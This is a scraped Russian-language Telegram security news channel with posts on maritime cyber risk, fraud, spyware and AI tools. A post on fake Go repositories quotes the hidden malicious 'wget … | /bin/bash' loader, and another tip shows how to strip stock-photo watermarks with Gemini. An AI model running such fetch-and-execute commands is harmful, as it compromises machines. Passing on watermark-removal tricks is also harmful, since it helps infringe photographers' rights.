Telegram Web Link
CyberOwl-HFW-Thetius-The-Lifecycle-Dilemma.pdf
2.6 MB
🛳"Эй, моряк, ты слишком долго плавал..."

📖🙂Нашёл кое-что интересное по морской ИБ-тематике.

Свежий отчет, подготовленный Thetius, DNV’s CyberOwl и международной юридической фирмой HFW, выявил большие пробелы в понимании судовладельцев того, что из себя представляет кибербезопасность в 2025. Оказалось, что лишь 1 из 6 владельцев морских судов в полной мере осознает понятие "кибербезопасность в море" и как правильно начать эксплуатировать судно по фэншую с точки зрения ИБ.

Документ под названием 📄 «Дилемма жизненного цикла: управление рисками кибербезопасности на этапах проектирования, строительства и эксплуатации судна» анализирует риски и разрозненные подходы к кибербезопасности на всех этапах жизненного цикла судна. В нём рассматриваются ключевые моменты судостроительной отрасли, мифы и заблуждения, связанные с кибербезопасностью .

В отчёте собраны мнения более 🚢150 экспертов, включая судовладельцев, операторов, производителей судового оборудования (OEM), моряков, страховщиков, представителей портов и экспертов по кибербезопасности. Он дает подробный анализ текущих и будущих угроз, а также оценивает готовность отрасли к выполнению новых нормативных требований и адаптации к технологическим изменениям.

📊Ключевые выводы исследования:

💠Доля судоходных компаний, которые выплачивают выкуп киберпреступникам, сократилась вдвое — с 14% до 7% за последние 12 месяцев.
💠Компании стали чаще отказываться от больших выкупов: средний размер выплаты снизился с $3,2 млн до $100 000.
💠17% судостроительных верфей заявляют, что обладают достаточной экспертизой в области кибербезопасности для проектирования и строительства защищённых судов​.
💠 Лишь 10% OEM-производителей внедряют концепцию security-by-design в новые системы. Остальные остаются уязвимыми перед потенциальными киберугрозами.
💠Только 32% судовладельцев учитывают фактор кибербезопасности при формировании команд, отвечающих за строительство новых судов. При этом в небольших компаниях за кибербез отвечают неподготовленные сотрудники​.
💠93% экипажей чувствуют себя неподготовленными к реагированию на современные киберугрозы.
💠70% считают, что ситуацию можно изменить к лучшему с помощью тренингов по кибербезопасности.
💠46% судостроительных верфей обеспокоены нехваткой знаний и навыков для проектирования и строительства защищённых судов​.

Партнер HFW Том Уолтерс
«Каждая пятая судоходная компания подверглась кибератаке за последние 12 месяцев
, что делает наш отчет как никогда актуальным. Судоходная отрасль все больше полагается на цифровые технологии, что неизбежно повышает риски со стороны злоумышленников. Компании, работающие на всех этапах жизненного цикла судов, должны предпринять решительные шаги для защиты своих активов».
Генеральный директор CyberOwl Дэниел Нг
«Наше исследование показывает, что мы вступаем в эпоху экспертных решений. Разовые меры по обеспечению кибербезопасности больше не работают. Угрозы эволюционируют на каждом этапе жизненного цикла судов, а регуляторы требуют комплексного подхода. Теперь как никогда важно, чтобы судовладельцы принимали правильные решения, основанные на знаниях, ведь ошибки, допущенные на этапе проектирования, могут серьезно повлиять на стоимость эксплуатации судна».


Основной вывод: без комплексного подхода к киберзащите на всех этапах жизненного цикла судна (строительство и ввод в эксплуатацию) избежать рисков невозможно. И в реальной ситуации когда происходит кибератака — планы реагирования часто оказываются нерабочими из-за отсутствия координации между экипажем, а также IT-службами на берегу​.

👆 Примечательно, что 60% всех киберинцидентов на судах связаны с вредоносным 🦠ПО (малварью). А из этих 60%, 77% происходят по причине использования 🤌 USB и других внешних устройств. Другими словами, подавляющее большинство вредоносных программ попадает на судно через флеш-накопители, внешние жесткие диски, ноутбуки инженеров и другие съемные носители.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
14
This media is not supported in your browser
VIEW IN TELEGRAM
🍿Кто-то решил почувствовать себя в роли главного героя видеоигры Watch Dogs.

💻В сети появилось видео, где исследователь демонстрирует перехват хэндшейка 🖥WPA2 с помощью смарт-часов TicWatch Pro 3 и Kali NetHunter. Трюк выполнялся со стареньким роутером TP-Link.

А-ля панагочи на смарт-часах.

🛡 Базовые меры защиты: Wi-Fi пароль должен быть длинным (не менее 16 символов), отключение WPS на роутере, фильтрация MAC-адресов, периодическая смена пароля, регулярное обновление прошивки, WIDS и мониторинг сети.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
🤖Стартап по производству роботов-гуманоидов Figure планирует выпускать до 100 000 роботов в год

Figure анонсировали "первую в мире" 🏭 высокопроизводительную фабрику по массовому выпуску гуманоидных роботов под названием "BotQ". Компания контролирует весь производственный процесс собственными силами: от производства компонентов до финальной сборки (процесс производства на видео). Об этом сообщил основатель стартапа в социальной сети Х.

По его словам, изначально планировалось производить до 12 000 гуманоидов в год, но сейчас амбиции Figure растут и компания хочет масштабироваться до выпуска 100 000 единиц роботов в ближайшие 4 года.

За последние восемь месяцев команда инженеров Figure разработала эффективный, масштабируемый и полностью интегрированный производственный процесс, обеспечивающий выпуск качественных и надежных роботов.

— сообщает компания.

😕 А теперь 🍒вишенка на 🍰торте:

Одной из главных инноваций BotQ станет использование 🤖гуманоидных роботов Figure для сборки🤖других роботов.

Фактически в Figure добиваются того, чтобы со временем роботы воспроизводили сами себя на конвейере.

👆🙂 Вспоминается повесть Филипа К. Дика «Вторая модель» (фильм Крикуны).

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
3
1️⃣ В новой бесплатной модельке 🌐 Gemini 2.0 Flash (Image Generation) Experimental можно убирать водяные знаки со стоковых фотографий (пример Shutterstock). Достаточно попросить в окне промпта — remove watermarks from this image.

2️⃣ Гугловская моделька в отличие от ChatGPT, Grok и прочих умеет классно в 🟦Photoshop. Достаточно загрузить изображение и попросить сделать визуальные изменения, регулируя 🥵temperature (отвечает за креативность ответов).

3️⃣ Можно менять фон (🤥 котик) или убирать предметы (пример с ✈️самолетом).

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
4
kaspersky_ics_cert_threat_landscape_for_industrial_automation_systems.pdf
6.1 MB
📄 Ландшафт угроз для систем промышленной автоматизации. Четвертый квартал 2024 — регионы.

👉 Источник: Kaspersky ICS CERT

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
🥷 ❗️Мошенники начали охотиться за биометрией россиян

Как рассказали ТАСС в 🇷🇺 МВД, мошенники под разными предлогами стали звонить людям по видеосвязи с целью записи голоса, получения других биометрических данных, которые потом используют для списания средств в банке.

Мошенники могут звонить под предлогом проверки качества связи якобы от оператора, предлагать услуги или товары, проводить мнимые опросы. При этом человеку задают вопросы, а он на них отвечает. Задача мошенников заполучить запись голоса абонента с ключевым словом ⚠️"да", - говорится в материалах.

🤖 Поскольку некоторые банки уже ввели, а многие только вводят биометрическую идентификацию клиентов, записанные во время разговоры голос человека и его лицо, позволяет мошенникам совершить хищение денег.

🤿"Записанное мошенниками слово "да" и другие фразы они могут ◀️ использовать при биометрической идентификации якобы согласием абонента на списание средств", — пояснили в ведомстве.

====

В связи с появившейся схемой мошенничества в МВД призвали к осторожности при звонках с неизвестных номеров. Если их избежать не удалось, то лучше следить за своей речью и не произносить "ключевые фразы" и не говорить "да", советуют в ведомстве. "Лучше сразу же завершить такой разговор", - говорится в материалах киберполиции.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
🇺🇸 Конгрессмены-республиканцы запросили документы от DHS по 🇨🇳 китайским киберугрозам Volt Typhoon и Salt Typhoon

Республиканцы из Комитета по внутренней безопасности Палаты представителей требуют от 👮Министерства внутренней безопасности (DHS) США раскрыть внутренние документы, касающиеся кибершпионских группировок Volt Typhoon и Salt Typhoon, связанных якобы с правительством 🇨🇳Китая. В понедельник комитет отправил запрос главе DHS Кристи Ноэм, требуя все документы, связанные с деятельностью этих групп с начала президентства Байдена. Администрацию Байдена критикуют за недостаточную прозрачность и вялую реакцию на эти кибератаки.

По данным разведки США, Volt Typhoon якобы в течение как минимум 5 лет взламывали системы КИИ и объекты гражданской инфраструктуры. Разговоры снова не обошли стороной телеком:

Якобы китайские хакеры могли даже прослушивать разговоры высокопоставленных чиновников, включая президента США Дональда Трампа и Джей Ди Вэнса.


Комитет по национальной безопасности выразил обеспокоенность тем, что администрация Байдена не обеспечила достаточную прозрачность в расследовании этих атак. Законодатели также требуют от DHS предоставить информацию о том, когда именно CISA впервые узнала о группах Volt Typhoon и Salt Typhoon, а также хронологию ответных действий в отношении хакеров. Все необходимые документы DHS должны быть переданы комитету до 31 марта 2025 года.

😱 Республиканцы на прошлой неделе обратились к 🇺🇸 администрации Трампа с требованием усилить потенциал возможностей по проведению киберопераций против Китая.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
🥷❗️Массовая атака на Go-разработчиков через поддельные GitHub-репозитории

В сообществе Go-разработчиков случился неприятный инцидент. Представители популярного проекта Atlas заметили, что злоумышленники "клонировали" один из их репозиториев на GitHub (GORM Provider), накрутили ⭐️ звёзды с помощью фейковых аккаунтов и 🦠внедрили вредоносный код, который выполняется при запуске. Проблема оказалась масштабнее, чем предполагалось изначально. В сети обнаружены десятки других репозиториев, использующих аналогичный метод атаки.

Поддельный репозиторий — ↔️ https://github[
.]com/readyrevena/atlas-provider-gorm (удалён) содержал скрытый код, загружающий и исполняющий вредоносный Bash-скрипт с удалённого сервера через команду:
wget -O - https://reque***ne.fun/storage/de373d0df/a31546bf | /bin/bash &


Ззлоумышленники потенциально могут выполнить код на машине разработчика: установить вредоносное ПО, шпионские программы или 🔒 шифровальщики. Исследователи безопасности обнаружили более 690 потенциально опасных репозиториев, получивших звёзды от фейковых аккаунтов, включая:

https://github.com/esteemedpar/guetzli-go (удалено)
https://github.com/closeddigit/macos-totp-cli (удалено)
https://github.com/frillymacaro/ai-search4ai-go (удалено)

и множество других.

Замечены вредоносные клоны: kubernixos, shelly-bulk-update, terraform-provider-atlas, gonet.

Ещё проблема состоит в том, что Go-разработчики часто устанавливают зависимости через go get <URL>, что делает возможным случайное добавление поддельного пакета в проект. В отличие от экосистемы npm или PyPI, у Go отсутствует централизованный механизм валидации пакетов.

🛡 Звучат различные идеи по улучшению безопасности:

1️⃣ Одобрение модулей перед публикацией (Modules Approval Process).
2️⃣ Введение доверенных издателей (Trusted Publishers).
3️⃣ Ограничения на установку неподтвержденных пакетов в go.mod.
4️⃣ Автоматическая проверка пакетов на вредоносный код в Go Proxy.
5️⃣ Более оперативное удаление вредоносных пакетов и форков на GitHub.
6️⃣ Создание инструментов для анализа зависимостей (аналог npm audit).

👆 Сообщество начало активно репортить вредоносные репозитории в саппорт GitHub. Microsoft пока только частично приняла меры по удалению репозиториев с сюрпризом. Некоторые всё ещё остаются доступны.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
4
🧑‍🎓🇺🇸 Студенты Стэнфорда устремились в военную сферу, позабыв о Кремниевой долине

Всего несколько лет назад работа в оборонной индустрии считалась среди студентов Стэнфорда не просто непопулярной, а почти «запятнанной». Однако ситуация cо временем резко изменилась благодаря усилиям государства. Теперь выпускники престижного университета все чаще выбирают карьеру в национальной безопасности, а стартапы в сфере военных технологий переживают настоящий бум.

Переломный момент для многих студентов наступил в 2022 году с курсом «Шпионы, ложь и алгоритмы», после которого интерес к оборонным технологиям резко возрос. Студентка факультета политологии Дивья Ганесан раньше смотрела на контракты с военными довольно скептически, но сейчас активно работает в этом направлении. Она основала студенческую организацию Stanford Women in National Security и стажировалась в АНБ , а также СISA. Сегодня многие её друзья работают в Palantir, который с приходом Дональда Трампа снова чувствует себя как рыба в воде.

Интерес студентов к военным технологиям резко возрос. Утверждается, что многие бросают учебу ради стартапов в оборонке и стремятся попасть в Palantir, Anduril и так далее. Программа "Взлом ради обороны", где студенты решают задачи военных, стала одной из самых популярных универе. В 2021 году университет открыл финансируемый ВМС США центр Gordian Knot, чтобы координировать работу в этом направлении.

Влияние войны на Украине и роста напряженности с 🇨🇳Китаем ощущается повсюду.

"США десятилетиями доминировали в мире, но Китай показывает взрывной рост, и теперь мы можем проиграть. Это вопрос экзистенциальный"

— говорит бывший студент Эндрю Фанг, который ради оборонного стартапа ушел из университета раньше на два года.

Инвесторы тоже не остаются в стороне. Вложения венчурного капитала в оборонные стартапы выросли в 10 раз с 2019 года, достигнув $3 млрд в 2024 году.

"Если что-то вспыхнет в Тихоокеанском регионе, то деньги польются рекой, как это было в Ираке и Афганистане"

— говорит один из студентов Стэнфорда.

Профессор Терри Виноград, известный своими антивоенными взглядами, обеспокоен тем, что растущий интерес к оборонной сфере может быть продиктован желанием инвесторов 👹 извлекать максимальную прибыль из будущих конфликтов, чем реальной необходимостью. Критики также указывают на возможные последствия тесного слияния частного сектора с военными, так как это может привести к геополитической эскалации и глобальной нестабильности.

Если раньше мечтой выпускников были Google и запрещенная в РФ Meta, то теперь их внимание приковано к технологиям, которые определяют будущее войн и национальной безопасности США.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
🇷🇺 Государственная Дума приняла в первом чтении законопроект, направленный на защиту граждан от телефонных мошенников и кибермошенников

Как сообщается на сайт duma.gov.ru, рассмотрение во втором чтении должно быть в приоритетном порядке, подчеркнул в ходе пленарного заседания Председатель ГД Вячеслав Володин. Он сообщил, что оно может состояться уже 25 марта.

Законопроектом, в частности, закрепляется возможность онлайн-обмена информацией между государственными органами, банками и цифровыми платформами. В пояснительной записке к документу отмечено, что автоматический мониторинг позволит практически моментально выявлять подозрительные действия, блокировать их и уведомлять правоохранительные органы о потенциальных преступлениях.

Кроме этого, инициативой:

💠вводится обязательная маркировка звонков от организаций и вызовов с международных номеров;

💠предлагается запретить сотрудникам государственных органов, банков и операторов связи и иным субъектам общаться с гражданами и клиентами через мессенджеры;

💠предлагается создать информационную антифрод-платформу, на которой будут храниться образцы голосов тех, кто использует доверие граждан в корыстных целях;

💠устанавливается запрет на передачу сим-карт третьим лицам;

💠для граждан вводится возможность установления запрета на заключение договоров об оказании услуг подвижной радиотелефонной связи без личного присутствия (запрет можно будет установить через портал «Госуслуги» или при обращении в МФЦ, а снять – только при личном посещении МФЦ).

Предусмотрены и иные нововведения, направленные на защиту от противоправных деяний, совершаемых с использованием информационных технологий. Законопроект объединил около 30 мер борьбы с мошенниками.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
Вчера решил попробовать протестировать китайского зверя под названием 🇨🇳Manus.

Многие из вас видели в сети видео, где на столе стоит монитор и ИИ-агент "что-то там делает, управляя 50 аккаунтами в соц.сетях". Якобы это Manus. Нет, друзья, это не Manus. Опроверг сам соучредитель.

Соучредитель Manus AI здесь! Спасибо за ваш интерес к Manus, но это видео определенно НЕ Manus 🤣. Наш официальный аккаунт — ManusAI_HQ. Manus — это веб-агент ИИ, как OpenAI Operator/DeepResearch, а не VNC для смартфонов.

— написал Ичао "Пик" Джи.

Manus это ИИ-агент, который ищет как Perplexity в режиме Deep Research или ChatGPT Deep research.

======

Отправил заявку на сайте Manus. Команда проекта буквально в течение 2 часов очень шустро одобрила мне доступ. За оперативность 5+.

Поделюсь пока только общими впечатлениями. Не претендую на истину.

Тестировал в течение одного дня. Даётся возможность сделать 3 глобальных ресерч запроса - так называемые trial tasks. И это бесплатно.

И как? Понравилось? Да, не то слово. Крайне положительные эмоции. Я бы даже сказал🤖пушка, он же китайский скайнет на минималках.

ИИ-агенту Manus была поставлена классическая маркетинговая задача исследовать рынок в регионах XYZ и оценить потенциал производства продуктов A/Б на ближайшие 5 лет. Промпт примерно на 3000 символов.

📄 Спустя 3 часа поисков в сети Manus выдал на английском мегарепорт на 57 страниц в pdf цифрами, таблицами, расчётами, блекджеком и анализом трендов. Написал оглавление и даже методологию.

Цифры выглядят правдоподобными в отчёте. Часть совпадает с тем, что было исследовано ранее. Проверю остальное на днях. Допускаю, что как и любой другой ИИ-агент он может ошибаться.

Но то что писали в сети ранее с точки зрения критики про Manus (якобы тупит и не даёт источники) — ничего такого не увидел. Может промпт некорректно составили или плохо разъяснили задачу?

С учётом повсеместного информационного шума лучше ручками перепроверять конкретно в рамках своих задач. Например, одному человеку подходит, а другому может не подойти. И наоборот.

В любом случае конкуренция со стороны Китая это большой плюс для нас всех. Пользователи от этого только выигрывают.

Какие есть явные минусы у Manus? Лимит контекста. Пока это главная ахиллесова пята. Разрабы удвоили его недавно, но мне не помогло.

Благодаря начальному промпту получился слишком развернутый ответ в pdf (57 страниц). После основного запроса попросил его ответить на ещё 4 дополнительных запроса в рамках одного таска, чтобы уточнить кое-какие детали, но он заглох. Manus has stopped because the context is too long, please start a new chat. Важно учитывать, что можно легко выйти за "контекст", когда сильно много букав. ИИ-модели не любят много букав читать.

Кстати, пробовал ранее практически идентичный маркетинговый запрос в Perplexity, ChatGPT, Grok и других (режим deep research или deepsearch) — ответы нервно курят в сторонке по сравнению с результатами китайца. Это субъективная точка зрения, но в моем конкретном случае это так. Среди ИИ-агентов/моделей в режиме deep research китайскому Manus смело даю 1 место.

У кого будет желание и возможность — обязательно пробуйте.

Промпт лучше писать на английском, чтобы он вас лучше понимал. Обязательно попросите его искать строго научные/надёжные источники, а не вики и прочее. В моём кейсе Manus выдал качественные научные референсы и аналитические репорты за 2023-2024, как я и просил.

👍 В очередной раз убеждаюсь, что китайские инженеры умеют в уникальные ИИ-продукты.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
4
🥷❗️Как шпионское ПО от Paragon проникало в устройства жертв через 📲Whatsapp?

Появились новые подробности от Citizenlab и Джона Скотт-Рейлтона по поводу шпионского ПО Graphite от Paragon.

Атака на WhatsApp с использованием шпионского ПО Paragon, известного как Graphite, представляет собой атаку нулевого клика (zero-click), при которой жертве не нужно выполнять никаких действий, чтобы её устройство было взломано. Специалисты Citizenlab утверждают, что атака выглядит примерно следующим образом:

1️⃣ Заражение могло происходить через отправление PDF в WhatsApp-группу. Атакующий добавляет жертву в группу и отправляет вредоносный PDF. Либо жертва и хакер уже находятся в одной группе.

2️⃣ Или заражение могло происходить через личное сообщение с отправлением PDF. Потом сообщение удаляется, якобы случайно кто-то ошибся.

3️⃣ Жертве не требовалось открывать какой-либо 📄файл или совершать другие действия.

4️⃣ Уязвимость в механизме обработки PDF-документов в WhatsApp могла автоматически приводить к выполнению вредоносного кода.

5️⃣ Шпионское ПО Paragon выходит за пределы изолированной среды Android (sandbox escape) и может заражать другие приложения на устройстве.

🕷Чем опасен этот метод атаки?
💠Жертве не нужно предпринимать никаких действий, чтобы устройство было заражено (zero-click exploit).
💠Шпионское ПО получает доступ к зашифрованным данным WhatsApp.
💠Атака может оставаться незамеченной долгое время, поскольку Graphite интегрируется в уже существующие процессы.
💠Выход за пределы WhatsApp. Шпионское ПО может затронуть другие приложения и сервисы.

🔍Почему Citizenlab убеждены в том, что к этому заражению причастна компания Paragon?

1️⃣ Цепочка инфраструктуры и фингерпринтинг
🔻 Citizen Lab идентифицировали серверную инфраструктуру, связанную с Paragon.
🔻 В рамках этой сети были найдены цифровые сертификаты, включая сертификат с именем "Graphite".
🔻 Анализ Fingerprint P1 и поиск по базе Censys выявил 150 связанных сертификатов.
🔻 Примерно половина из них активно использовалась на IP-адресах.
🔻 Часть этих сертификатов была связана с IP-адресами в Израиле, где базируется Paragon.

2️⃣ Методология атаки совпадает с описанными возможностями Graphite
🔻 Graphite не берет полный контроль над устройством, как Pegasus, а инфильтрирует мессенджеры.
🔻 WhatsApp был заражен, а затем шпионское ПО распространялось на другие приложения. Cовпадает с техническим описанием Graphite.
🔻 В ходе анализа зараженных устройств был обнаружен артефакт BIGPRETZEL, который был идентифицирован как уникальный признак заражения Graphite.

3️⃣ BIGPRETZEL – индикатор заражения Graphite
🔻 Исследователи нашли уникальный цифровой артефакт BIGPRETZEL в памяти зараженных устройств.
🔻 Этот же артефакт WhatsApp подтвердил как признак заражения Graphite.

4️⃣ Признания Paragon и их действия после утечки
🔻 После публикации расследования Paragon не отрицал причастность, а лишь заявил, что в отчете есть «неточности», но отказался их уточнить.
🔻 Paragon разорвал контракты с итальянскими клиентами сразу после публикации расследования.

Уязвимость была исправлена Whatsapp без необходимости действий со стороны пользователей. После этого компания уведомила около 90 пользователей из более чем 20 стран, включая журналистов и активистов, о том, что они могли стать жертвами этой атаки.

👆 Некоторые уже задумались сделать ограничение на добавление себя в группы. ​

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
3
2025/07/09 00:14:31
Back to Top
HTML Embed Code: